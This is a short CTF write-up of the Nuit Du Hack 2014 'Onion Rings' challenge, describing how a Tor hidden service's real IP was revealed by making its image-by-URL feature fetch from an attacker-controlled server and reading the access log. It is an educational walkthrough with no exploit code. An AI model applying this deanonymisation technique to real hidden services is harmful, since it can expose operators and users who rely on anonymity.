Nuit Du Hack 2014 Quals CTF WriteUp: Onion Rings (aka Misc 150 aka Funion Rings)

Just finished Nuit Du Hack Quals, and I wanted to write up a really fun, simple, web and Tor challenge, fantastic for learning! Putting theory to practice, this is a great practical example of a Tor hidden service correlation attack. The challenge started simple enough, only giving you a link to a Tor hidden service: http://mq72g4732yorslzf.onion/ (with no https though [sadface]...). If your new to Tor, the quickest way to get on the special network, and thus access .onion domains, is to use the Tor browser bundle. Once we have our Tor browser running, it's easy to see the .onion site in question is a black market site: 

The site also features the ability to change your profile picture, not just through uploading a photo but also by giving it a URL:

If you give it the URL of a site you control, you will see it call out to your site in the http access log, located in /var/log/httpd/access_log for Apache:

212.xxx.xxx.197 - - [05/Apr/2014:21:00:45 +0000] GET "/lol.gif HTTP/1.1" 200 59554 "-" "-"

This is a repeatable process and if we browse to the disclosed IP, we can see that the site isn't routing the traffic properly through the Tor network. On this new page we can easily spot the flag with ctrl+f "flag", and wa-la a fast challenge down:

I also liked the research that went into solving this challenge.  Along the way I read some really good articles on the theory of hidden services, how to configure a Tor hidden service, and a paper on the Tor Rendezvous Protocol. 

I also really enjoyed the flavor texts throughout the Nuit Du Hack ctf, it made it really entertaining while playing. Here's another jem they cloned for content in the ctf: http://www.funnyordie.com/articles/8b428100e2/how-to-hack-chipotle